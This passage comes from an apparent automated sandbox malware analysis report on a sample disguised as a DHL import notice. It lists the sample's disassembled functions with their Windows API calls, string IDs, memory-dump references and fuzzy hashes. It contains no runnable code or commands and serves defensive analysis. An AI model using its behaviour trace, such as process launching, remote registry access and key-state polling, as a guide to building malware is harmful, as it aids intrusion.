                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                                                          • String ID: 0
                                                                                          • API String ID: 1227352736-4108050209
                                                                                          • Opcode ID: b80dcfeeffe5d02694a64871af754b3f9f4775b7cc7ed4ae3aac5b0106b98443
                                                                                          • Instruction ID: 9f95cf98174b014e67d1d3b28d807a691b3774ae55d9d38d2072a5a1c9f122d2
                                                                                          • Opcode Fuzzy Hash: b80dcfeeffe5d02694a64871af754b3f9f4775b7cc7ed4ae3aac5b0106b98443
                                                                                          • Instruction Fuzzy Hash: 6951BF716143019BD7149F28C889B6BB7E8FFD9314F040A2DF995F32A1EBA4D904CB92
                                                                                          APIs
                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 0085AEA3
                                                                                            • Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625
                                                                                          • GetProcessId.KERNEL32(00000000), ref: 0085AF38
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0085AF67
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                          • String ID: <$@
                                                                                          • API String ID: 146682121-1426351568
                                                                                          • Opcode ID: b676bd8793ded3c6c2f8d17524eddaf0af683e34c49462f6ea9f4cf356757385
                                                                                          • Instruction ID: 0bee7db29d7fd59d5ed00fc8b39cf4986e3bc60b10c3821ba258fd39ffcb93a1
                                                                                          • Opcode Fuzzy Hash: b676bd8793ded3c6c2f8d17524eddaf0af683e34c49462f6ea9f4cf356757385
                                                                                          • Instruction Fuzzy Hash: 41718C75A00219DFCB18DF54D489A9EBBF0FF08304F04859AE816AB352DB74ED45CB91
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00837206
                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0083723C
                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0083724D
                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008372CF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                          • String ID: DllGetClassObject
                                                                                          • API String ID: 753597075-1075368562
                                                                                          • Opcode ID: 89306fea5b1e11ba8d9072c512c990c6cfc4c51692de9449804bc763fe51f1f9
                                                                                          • Instruction ID: 640867ce8fd61e76147eb52f6ae53e3a644028ecf0cbd4234357a4472f743381
                                                                                          • Opcode Fuzzy Hash: 89306fea5b1e11ba8d9072c512c990c6cfc4c51692de9449804bc763fe51f1f9
                                                                                          • Instruction Fuzzy Hash: 66412DB1604205EFDB25CF94C884A9B7BA9FF85314F1580A9BD06DF20AD7B5D944CBE0
                                                                                          APIs
                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00863E35
                                                                                          • IsMenu.USER32(?), ref: 00863E4A
                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00863E92
                                                                                          • DrawMenuBar.USER32 ref: 00863EA5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                          • String ID: 0
                                                                                          • API String ID: 3076010158-4108050209
                                                                                          • Opcode ID: 9e2a095f1c7f694f759118abd1039df231890f669e269497da46c75c4a394367
                                                                                          • Instruction ID: 1710b10faf9fd7761b673543355a6320d7cc6921f82d706dcba0f64e877d3a80
                                                                                          • Opcode Fuzzy Hash: 9e2a095f1c7f694f759118abd1039df231890f669e269497da46c75c4a394367
                                                                                          • Instruction Fuzzy Hash: AB4154B5A00209EFDB10DF60D888EAABBF9FF49354F05402AE905AB650D735AE40CF60
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA
                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00831E66
                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00831E79
                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00831EA9
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$_wcslen$ClassName
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 2081771294-1403004172
                                                                                          • Opcode ID: 3f7cf38cec6ab88580e3d9f373b7bde84edd24da50fe8c5d9692bf5aa15bc050
                                                                                          • Instruction ID: 2ac97ce0731a2bd16e092f3e67138206709c84e69b9ce9e377e1a338b39c8238
                                                                                          • Opcode Fuzzy Hash: 3f7cf38cec6ab88580e3d9f373b7bde84edd24da50fe8c5d9692bf5aa15bc050
                                                                                          • Instruction Fuzzy Hash: B9212371A00104AEDF14AB64DC49CFFB7B8FF85764F14411AF825E32E0DB794D0A8660
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                          • API String ID: 176396367-4004644295
                                                                                          • Opcode ID: 3b12583bfcd084839f6d5eb03458551d0d734fd5b5504bf775f2d8aa12be6326
                                                                                          • Instruction ID: 944d28699e858fbbc5174728bf527b21acd4bcdf4d6f23c9ba21ea13b0a5d663
                                                                                          • Opcode Fuzzy Hash: 3b12583bfcd084839f6d5eb03458551d0d734fd5b5504bf775f2d8aa12be6326
                                                                                          • Instruction Fuzzy Hash: B431F7B26002798FCF22EF6C99404BF3BA1FBA1752B054029EC45EB345E674CD48DBA0
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00862F8D
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00862F94
                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00862FA9
                                                                                          • DestroyWindow.USER32(?), ref: 00862FB1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                          • String ID: SysAnimate32
                                                                                          • API String ID: 3529120543-1011021900
                                                                                          • Opcode ID: ecb8d5bc115c4f85dd7b72fad87bdd3a94f3aa44f380cc1f71c1db61b2b5b447
                                                                                          • Instruction ID: 28910fe9f4c37563576dfc74d62e9840f1fdb8f6cf2f9de95c536a001d56d85b
                                                                                          • Opcode Fuzzy Hash: ecb8d5bc115c4f85dd7b72fad87bdd3a94f3aa44f380cc1f71c1db61b2b5b447
                                                                                          • Instruction Fuzzy Hash: 8121DC71200609ABEF205FA4DC80FBB37B9FF59368F124268FA50D61A0CBB1DC519760
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007F4D1E,008028E9,?,007F4CBE,008028E9,008988B8,0000000C,007F4E15,008028E9,00000002), ref: 007F4D8D
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007F4DA0
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,007F4D1E,008028E9,?,007F4CBE,008028E9,008988B8,0000000C,007F4E15,008028E9,00000002,00000000), ref: 007F4DC3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: 9b4f72a97975287ac950f5891c2cf956afa6e2d54d21bb8cfff60523bd7b6257
                                                                                          • Instruction ID: 722cd4dc54e1bdfecc5725ae667188a03582b0d680417e4766dcbe4ad7bced1d
                                                                                          • Opcode Fuzzy Hash: 9b4f72a97975287ac950f5891c2cf956afa6e2d54d21bb8cfff60523bd7b6257
                                                                                          • Instruction Fuzzy Hash: 2AF04F34A4020CFBDB159F94DC49BBEBBB5FF44752F0540A5FA09A2360DB759940CB90
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32 ref: 0082D3AD
                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0082D3BF
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0082D3E5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 145871493-2590602151
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,007D4EDD,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007D4EAE
• FreeLibrary.KERNEL32(00000000,?,?,007D4EDD,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4EC0
Strings
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00813CDE,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E62
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007D4E74
• FreeLibrary.KERNEL32(00000000,?,?,00813CDE,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E87
Strings
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00842C05
• DeleteFileW.KERNEL32(?), ref: 00842C87
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00842C9D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00842CAE
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00842CC0
Similarity
• API ID: File$Delete$Copy
• String ID:
• API String ID: 3226157194-0
APIs
• GetCurrentProcessId.KERNEL32 ref: 0085A427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0085A435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0085A468
• CloseHandle.KERNEL32(?), ref: 0085A63D
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
APIs
  • Part of subcall function 0083DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0083CF22,?), ref: 0083DDFD
  • Part of subcall function 0083DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0083CF22,?), ref: 0083DE16
  • Part of subcall function 0083E199: GetFileAttributesW.KERNEL32(?,0083CF95), ref: 0083E19A
• lstrcmpiW.KERNEL32(?,?), ref: 0083E473
• MoveFileW.KERNEL32(?,?), ref: 0083E4AC
• _wcslen.LIBCMT ref: 0083E5EB
• _wcslen.LIBCMT ref: 0083E603
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0083E650
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
APIs
  • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
  • Part of subcall function 0085C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0085B6AE,?,?), ref: 0085C9B5
  • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085C9F1
  • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA68
  • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0085BAA5
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0085BB00
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0085BB63
• RegCloseKey.ADVAPI32(?,?), ref: 0085BBA6
• RegCloseKey.ADVAPI32(00000000), ref: 0085BBB3
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
APIs
• VariantInit.OLEAUT32(?), ref: 00838BCD
• VariantClear.OLEAUT32 ref: 00838C3E
• VariantClear.OLEAUT32 ref: 00838C9D
• VariantClear.OLEAUT32(?), ref: 00838D10
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00838D3B
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00848BAE
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00848BDA
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00848C32
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00848C57
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00848C5F
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 00858F40
• GetProcAddress.KERNEL32(00000000,?), ref: 00858FD0
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00858FEC
• GetProcAddress.KERNEL32(00000000,?), ref: 00859032
• FreeLibrary.KERNEL32(00000000), ref: 00859052
  • Part of subcall function 007EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00841043,?,753CE610), ref: 007EF6E6
  • Part of subcall function 007EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0082FA64,00000000,00000000,?,?,00841043,?,753CE610,?,0082FA64), ref: 007EF70D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                          • String ID:
                                                                                          • API String ID: 666041331-0
                                                                                          • Opcode ID: 6ec6981ea4483b56632af7e22a6259553a7b30d861e01afa1bda0fc4af9ea462
                                                                                          • Instruction ID: 4e82d08cedc897426bc670ce55165b9d7162791eebff91b28ac4d84a410812c9
                                                                                          • Opcode Fuzzy Hash: 6ec6981ea4483b56632af7e22a6259553a7b30d861e01afa1bda0fc4af9ea462
                                                                                          • Instruction Fuzzy Hash: EA512935600245DFC715DF58C4948ADBBF1FF49315B0980AAEC4AAB362DB35ED89CB90
                                                                                          APIs
                                                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00866C33
                                                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00866C4A
                                                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00866C73
                                                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0084AB79,00000000,00000000), ref: 00866C98
                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00866CC7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long$MessageSendShow
                                                                                          • String ID:
                                                                                          • API String ID: 3688381893-0
                                                                                          • Opcode ID: e8da5136f5decd2a93564dc31c7f1bd4a12149bffbe012b7fc9269a0e1be9136
                                                                                          • Instruction ID: b8b08d24a00213aeca5af239b4339d649611bca8924755320d388e7795f42e5e
                                                                                          • Opcode Fuzzy Hash: e8da5136f5decd2a93564dc31c7f1bd4a12149bffbe012b7fc9269a0e1be9136
                                                                                          • Instruction Fuzzy Hash: C841D635A04584AFDB24CF28CC59FB57FA5FB09364F160228F895E72E0E371AD61CA40
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID:
                                                                                          • API String ID: 269201875-0
                                                                                          • Opcode ID: e9bdddf38ad54571e5b2218e53834f071da863af7b08141b1a097220df84aff7
                                                                                          • Instruction ID: 26deb6b3402912def2d0ba03a5a17e54c6465d59b4ee11bc33a14275666d7848
                                                                                          • Opcode Fuzzy Hash: e9bdddf38ad54571e5b2218e53834f071da863af7b08141b1a097220df84aff7
                                                                                          • Instruction Fuzzy Hash: 0F41E132A00604DFCB20DF78CC88A5EB7B5FF89314F1545A9E615EB392DA71AD01CB81
                                                                                          APIs
                                                                                          • GetCursorPos.USER32(?), ref: 007E9141
                                                                                          • ScreenToClient.USER32(00000000,?), ref: 007E915E
                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 007E9183
                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 007E919D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                          • String ID:
                                                                                          • API String ID: 4210589936-0
                                                                                          • Opcode ID: 8c2c8a9d7e896fa3e91d1aa0ccb6d0cdf436cbfb77869c82b05265fa9de129ab
                                                                                          • Instruction ID: 5c77d0dc55b3abd452984299c820b7d5fadd9084ce1bf90980e77aa802a823ee
                                                                                          • Opcode Fuzzy Hash: 8c2c8a9d7e896fa3e91d1aa0ccb6d0cdf436cbfb77869c82b05265fa9de129ab
                                                                                          • Instruction Fuzzy Hash: 7741613190855AFBDF159F69D848BEEB774FF09324F204219E529A32D0C7745D90CB51
                                                                                          APIs
                                                                                          • GetInputState.USER32 ref: 008438CB
                                                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00843922
                                                                                          • TranslateMessage.USER32(?), ref: 0084394B
                                                                                          • DispatchMessageW.USER32(?), ref: 00843955
                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00843966
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                          • String ID:
                                                                                          • API String ID: 2256411358-0
                                                                                          • Opcode ID: 81681e0811f55dee0a1fb6e5ecc518ee3e040ad39f33e2f577e67d5ecf76fe92
                                                                                          • Instruction ID: d8aed37640d53bfe4ae4bd9a38933d9dd1894a7926a01ea8d4e2f4232ec67475
